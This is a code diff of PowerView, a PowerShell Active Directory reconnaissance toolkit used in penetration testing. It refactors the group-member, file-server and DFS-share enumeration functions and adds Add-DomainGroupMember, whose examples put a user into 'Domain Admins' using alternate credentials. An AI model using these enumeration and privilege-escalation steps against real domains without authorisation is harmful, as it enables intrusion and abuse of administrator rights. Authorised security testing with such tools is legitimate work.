+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+        [String[]]
+        $Identity,
+
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
+
+        [Parameter(ParameterSetName = 'ManualRecurse')]
+        [Switch]
+        $Recurse,
+
+        [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')]
+        [Switch]
+        $RecurseUsingMatchingRule,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        # so this isn't repeated if users are passed on the pipeline
-        $GroupSearcher = Get-DomainSearcher -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        $SearcherArguments = @{
+            'Properties' = 'member,samaccountname,distinguishedname'
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+        $ADNameArguments = @{}
+        if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
     }
 
-    process {
+    PROCESS {
+        $GroupSearcher = Get-DomainSearcher @SearcherArguments
         if ($GroupSearcher) {
-            if ($Recurse -and $UseMatchingRule) {
-                # resolve the group to a distinguishedname
-                if ($GroupName) {
-                    $Group = Get-NetGroup -AllTypes -GroupName $GroupName -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
-                }
-                elseif ($SID) {
-                    $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
-                }
-                else {
-                    # default to domain admins
-                    $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"
-                    $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize
-                }
-                $GroupDN = $Group.distinguishedname
-                $GroupFoundName = $Group.samaccountname
-
-                if ($GroupDN) {
-                    $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupDN)$Filter)"
-                    $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName','samaccounttype','lastlogon','lastlogontimestamp','dscorepropagationdata','objectsid','whencreated','badpasswordtime','accountexpires','iscriticalsystemobject','name','usnchanged','objectcategory','description','codepage','instancetype','countrycode','distinguishedname','cn','admincount','logonhours','objectclass','logoncount','usncreated','useraccountcontrol','objectguid','primarygroupid','lastlogoff','samaccountname','badpwdcount','whenchanged','memberof','pwdlastset','adspath'))
+            if ($PSBoundParameters['RecurseUsingMatchingRule']) {
+                $SearcherArguments['Identity'] = $Identity
+                $SearcherArguments['Raw'] = $True
+                $Group = Get-DomainGroup @SearcherArguments
 
-                    $Members = $GroupSearcher.FindAll()
-                    $GroupFoundName = $GroupName
+                if (-not $Group) {
+                    Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity"
                 }
                 else {
-                    Write-Error "Unable to find Group"
+                    $GroupFoundName = $Group.properties.item('samaccountname')[0]
+                    $GroupFoundDN = $Group.properties.item('distinguishedname')[0]
+
+                    if ($PSBoundParameters['Domain']) {
+                        $GroupFoundDomain = $Domain
+                    }
+                    else {
+                        # if a domain isn't passed, try to extract it from the found group distinguished name
+                        if ($GroupFoundDN) {
+                            $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                        }
+                    }
+                    Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned."
+                    $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))"
+                    $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName'))
+                    $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]}
                 }
+                $Null = $SearcherArguments.Remove('Raw')
             }
             else {
-                if ($GroupName) {
-                    $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)"
+                $IdentityFilter = ''
+                $Filter = ''
+                $Identity | Where-Object {$_} | ForEach-Object {
+                    $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                    if ($IdentityInstance -match '^S-1-') {
+                        $IdentityFilter += "(objectsid=$IdentityInstance)"
+                    }
+                    elseif ($IdentityInstance -match '^CN=') {
+                        $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                    }
+                    elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                        $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                        $IdentityFilter += "(objectguid=$GuidByteString)"
+                    }
+                    elseif ($IdentityInstance.Contains('\')) {
+                        $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+                        if ($ConvertedIdentityInstance) {
+                            $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+                            $GroupName = $IdentityInstance.Split('\')[1]
+                            $IdentityFilter += "(samAccountName=$GroupName)"
+                            $SearcherArguments['Domain'] = $GroupDomain
+                            Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+                            $GroupSearcher = Get-DomainSearcher @SearcherArguments
+                        }
+                    }
+                    else {
+                        $IdentityFilter += "(samAccountName=$IdentityInstance)"
+                    }
                 }
-                elseif ($SID) {
-                    $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+
+                if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                    $Filter += "(|$IdentityFilter)"
                 }
-                else {
-                    # default to domain admins
-                    $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"
-                    $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)"
+
+                if ($PSBoundParameters['LDAPFilter']) {
+                    Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter"
+                    $Filter += "$LDAPFilter"
                 }
 
+                $GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
+                Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)"
                 try {
                     $Result = $GroupSearcher.FindOne()
                 }
                 catch {
+                    Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_"
                     $Members = @()
                 }
 
                 $GroupFoundName = ''
+                $GroupFoundDN = ''
 
                 if ($Result) {
-                    $Members = $Result.properties.item("member")
-
-                    if($Members.count -eq 0) {
+                    $Members = $Result.properties.item('member')
 
+                    if ($Members.count -eq 0) {
+                        # ranged searching, thanks @meatballs__ !
                         $Finished = $False
                         $Bottom = 0
                         $Top = 0
 
-                        while(!$Finished) {
+                        while (-not $Finished) {
                             $Top = $Bottom + 1499
                             $MemberRange="member;range=$Bottom-$Top"
                             $Bottom += 1500
-                            
-                            $GroupSearcher.PropertiesToLoad.Clear()
-                            [void]$GroupSearcher.PropertiesToLoad.Add("$MemberRange")
-                            [void]$GroupSearcher.PropertiesToLoad.Add("samaccountname")
+                            $Null = $GroupSearcher.PropertiesToLoad.Clear()
+                            $Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange")
+                            $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname')
+                            $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname')
+
                             try {
                                 $Result = $GroupSearcher.FindOne()
                                 $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*"
                                 $Members += $Result.Properties.item($RangedProperty)
-                                $GroupFoundName = $Result.properties.item("samaccountname")[0]
+                                $GroupFoundName = $Result.properties.item('samaccountname')[0]
+                                $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
 
-                                if ($Members.count -eq 0) { 
+                                if ($Members.count -eq 0) {
                                     $Finished = $True
                                 }
                             }
@@ -5466,46 +9450,44 @@ function Get-NetGroupMember {
                         }
                     }
                     else {
-                        $GroupFoundName = $Result.properties.item("samaccountname")[0]
+                        $GroupFoundName = $Result.properties.item('samaccountname')[0]
+                        $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
                         $Members += $Result.Properties.item($RangedProperty)
                     }
+
+                    if ($PSBoundParameters['Domain']) {
+                        $GroupFoundDomain = $Domain
+                    }
+                    else {
+                        # if a domain isn't passed, try to extract it from the found group distinguished name
+                        if ($GroupFoundDN) {
+                            $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                        }
+                    }
                 }
-                $GroupSearcher.dispose()
             }
 
-            $Members | Where-Object {$_} | ForEach-Object {
-                # if we're doing the LDAP_MATCHING_RULE_IN_CHAIN recursion
+            ForEach ($Member in $Members) {
                 if ($Recurse -and $UseMatchingRule) {
                     $Properties = $_.Properties
-                } 
+                }
                 else {
-                    if($TargetDomainController) {
-                        $Result = [adsi]"LDAP://$TargetDomainController/$_"
-                    }
-                    else {
-                        $Result = [adsi]"LDAP://$_"
-                    }
-                    if($Result){
-                        $Properties = $Result.Properties
-                    }
+                    $ObjectSearcherArguments = $SearcherArguments.Clone()
+                    $ObjectSearcherArguments['Identity'] = $Member
+                    $ObjectSearcherArguments['Raw'] = $True
+                    $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass'
+                    $Object = Get-DomainObject @ObjectSearcherArguments
+                    $Properties = $Object.Properties
                 }
 
-                if($Properties) {
-
-                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Properties.samaccounttype
-
-                    if ($FullData) {
-                        $GroupMember = Convert-LDAPProperty -Properties $Properties
-                    }
-                    else {
-                        $GroupMember = New-Object PSObject
-                    }
-
-                    $GroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain
+                if ($Properties) {
+                    $GroupMember = New-Object PSObject
+                    $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain
                     $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName
+                    $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN
 
-                    if($Properties.objectSid) {
-                        $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectSid[0],0).Value)
+                    if ($Properties.objectsid) {
+                        $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value)
                     }
                     else {
                         $MemberSID = $Null
@@ -5513,29 +9495,29 @@ function Get-NetGroupMember {
 
                     try {
                         $MemberDN = $Properties.distinguishedname[0]
-
-                        if (($MemberDN -match 'ForeignSecurityPrincipals') -and ($MemberDN -match 'S-1-5-21')) {
+                        if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') {
                             try {
-                                if(-not $MemberSID) {
+                                if (-not $MemberSID) {
                                     $MemberSID = $Properties.cn[0]
                                 }
-                                $MemberSimpleName = Convert-SidToName -SID $MemberSID | Convert-ADName -InputType 'NT4' -OutputType 'Simple'
-                                if($MemberSimpleName) {
+                                $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments
+
+                                if ($MemberSimpleName) {
                                     $MemberDomain = $MemberSimpleName.Split('@')[1]
                                 }
                                 else {
-                                    Write-Warning "Error converting $MemberDN"
+                                    Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
                                     $MemberDomain = $Null
                                 }
                             }
                             catch {
-                                Write-Warning "Error converting $MemberDN"
+                                Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
                                 $MemberDomain = $Null
                             }
                         }
                         else {
                             # extract the FQDN from the Distinguished Name
-                            $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
+                            $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
                         }
                     }
                     catch {
@@ -5546,507 +9528,831 @@ function Get-NetGroupMember {
                     if ($Properties.samaccountname) {
                         # forest users have the samAccountName set
                         $MemberName = $Properties.samaccountname[0]
-                    } 
+                    }
                     else {
                         # external trust users have a SID, so convert it
                         try {
-                            $MemberName = Convert-SidToName $Properties.cn[0]
+                            $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments
                         }
                         catch {
                             # if there's a problem contacting the domain to resolve the SID
-                            $MemberName = $Properties.cn
+                            $MemberName = $Properties.cn[0]
                         }
                     }
 
+                    if ($Properties.objectclass -match 'computer') {
+                        $MemberObjectClass = 'computer'
+                    }
+                    elseif ($Properties.objectclass -match 'group') {
+                        $MemberObjectClass = 'group'
+                    }
+                    elseif ($Properties.objectclass -match 'user') {
+                        $MemberObjectClass = 'user'
+                    }
+                    else {
+                        $MemberObjectClass = $Null
+                    }
                     $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
                     $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName
+                    $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN
+                    $GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass
                     $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID
-                    $GroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup
-                    $GroupMember | Add-Member Noteproperty 'MemberDN' $MemberDN
-                    $GroupMember.PSObject.TypeNames.Add('PowerView.GroupMember')
+                    $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember')
                     $GroupMember
 
                     # if we're doing manual recursion
-                    if ($Recurse -and !$UseMatchingRule -and $IsGroup -and $MemberName) {
-                        if($FullData) {
-                            Get-NetGroupMember -FullData -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize
-                        }
-                        else {
-                            Get-NetGroupMember -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize
-                        }
+                    if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) {
+                        Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN"
+                        $SearcherArguments['Identity'] = $MemberDN
+                        $Null = $SearcherArguments.Remove('Properties')
+                        Get-DomainGroupMember @SearcherArguments
                     }
                 }
             }
+            $GroupSearcher.dispose()
         }
     }
 }
 
 
-function Get-NetFileServer {
+function Add-DomainGroupMember {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Returns a list of all file servers extracted from user 
-        homedirectory, scriptpath, and profilepath fields.
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
 
-    .PARAMETER Domain
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-PrincipalContext  
 
-        The domain to query for user file servers, defaults to the current domain.
+.DESCRIPTION
 
-    .PARAMETER DomainController
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Identity
 
-    .PARAMETER TargetUsers
+A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
 
-        An array of users to query for file servers.
+.PARAMETER Members
 
-    .PARAMETER PageSize
+One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName
+(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Domain
 
-    .PARAMETER Credential
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        PS C:\> Get-NetFileServer
-        
-        Returns active file servers.
+.EXAMPLE
 
-    .EXAMPLE
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
 
-        PS C:\> Get-NetFileServer -Domain testing
-        
-        Returns active file servers for the 'testing' domain.
+Adds harmj0y to 'Domain Admins' in the current domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
+
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [CmdletBinding()]
-    param(
+    Param(
+        [Parameter(Position = 0, Mandatory = $True)]
+        [Alias('GroupName', 'GroupIdentity')]
         [String]
-        $Domain,
+        $Identity,
 
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('MemberIdentity', 'Member', 'DistinguishedName')]
+        [String[]]
+        $Members,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $DomainController,
+        $Domain,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        $ContextArguments = @{
+            'Identity' = $Identity
+        }
+        if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+
+        $GroupContext = Get-PrincipalContext @ContextArguments
 
+        if ($GroupContext) {
+            try {
+                $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)
+            }
+            catch {
+                Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_"
+            }
+        }
+    }
+
+    PROCESS {
+        if ($Group) {
+            ForEach ($Member in $Members) {
+                if ($Member -match '.+\\.+') {
+                    $ContextArguments['Identity'] = $Member
+                    $UserContext = Get-PrincipalContext @ContextArguments
+                    if ($UserContext) {
+                        $UserIdentity = $UserContext.Identity
+                    }
+                }
+                else {
+                    $UserContext = $GroupContext
+                    $UserIdentity = $Member
+                }
+                Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'"
+                $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)
+                $Group.Members.Add($Member)
+                $Group.Save()
+            }
+        }
+    }
+}
+
+
+function Get-DomainFileServer {
+<#
+.SYNOPSIS
+
+Returns a list of servers likely functioning as file servers.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher  
+
+.DESCRIPTION
+
+Returns a list of likely fileservers by searching for all users in Active Directory
+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
+the server names.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainFileServer
+
+Returns active file servers for the current domain.
+
+.EXAMPLE
+
+Get-DomainFileServer -Domain testing.local
+
+Returns active file servers for the 'testing.local' domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainFileServer -Credential $Cred
+
+.OUTPUTS
+
+String
+
+One or more strings representing file server names.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([String])]
+    [CmdletBinding()]
+    Param(
+        [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainName', 'Name')]
         [String[]]
-        $TargetUsers,
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
 
-        [ValidateRange(1,10000)] 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    function SplitPath {
-        # short internal helper to split UNC server paths
-        param([String]$Path)
+    BEGIN {
+        function Split-Path {
+            # short internal helper to split UNC server paths
+            Param([String]$Path)
 
-        if ($Path -and ($Path.split("\\").Count -ge 3)) {
-            $Temp = $Path.split("\\")[2]
-            if($Temp -and ($Temp -ne '')) {
-                $Temp
+            if ($Path -and ($Path.split('\\').Count -ge 3)) {
+                $Temp = $Path.split('\\')[2]
+                if ($Temp -and ($Temp -ne '')) {
+                    $Temp
+                }
             }
         }
+
+        $SearcherArguments = @{
+            'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))'
+            'Properties' = 'homedirectory,scriptpath,profilepath'
+        }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
     }
-    $filter = "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(scriptpath=*)(homedirectory=*)(profilepath=*))"
-    Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -Filter $filter | Where-Object {$_} | Where-Object {
-            # filter for any target users
-            if($TargetUsers) {
-                $TargetUsers -Match $_.samAccountName
-            }
-            else { $True }
-        } | ForEach-Object {
-            # split out every potential file server path
-            if($_.homedirectory) {
-                SplitPath($_.homedirectory)
-            }
-            if($_.scriptpath) {
-                SplitPath($_.scriptpath)
-            }
-            if($_.profilepath) {
-                SplitPath($_.profilepath)
-            }
 
-        } | Where-Object {$_} | Sort-Object -Unique
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            ForEach ($TargetDomain in $Domain) {
+                $SearcherArguments['Domain'] = $TargetDomain
+                $UserSearcher = Get-DomainSearcher @SearcherArguments
+                # get all results w/o the pipeline and uniquify them (I know it's not pretty)
+                $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
+            }
+        }
+        else {
+            $UserSearcher = Get-DomainSearcher @SearcherArguments
+            $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
+        }
+    }
 }
 
 
-function Get-DFSshare {
+function Get-DomainDFSShare {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns a list of all fault-tolerant distributed file systems
+for the current (or specified) domains.
+
+Author: Ben Campbell (@meatballs__)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher  
+
+.DESCRIPTION
+
+This function searches for all distributed file systems (either version
+1, 2, or both depending on -Version X) by searching for domain objects
+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
+The server data is parsed appropriately and returned.
+
+.PARAMETER Domain
+
+Specifies the domains to use for the query, defaults to the current domain.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Returns a list of all fault-tolerant distributed file
-        systems for a given domain.
+.PARAMETER SearchScope
 
-    .PARAMETER Version
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        The version of DFS to query for servers.
-        1/v1, 2/v2, or all
+.PARAMETER ResultPageSize
 
-    .PARAMETER Domain
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The domain to query for user DFS shares, defaults to the current domain.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER DomainController
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
 
-    .PARAMETER ADSpath
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER Credential
 
-    .PARAMETER PageSize
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        The PageSize to set for the LDAP searcher object.
+.EXAMPLE
 
-    .PARAMETER Credential
+Get-DomainDFSShare
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Returns all distributed file system shares for the current domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DFSshare
+Get-DomainDFSShare -Domain testlab.local
 
-        Returns all distributed file system shares for the current domain.
+Returns all distributed file system shares for the 'testlab.local' domain.
 
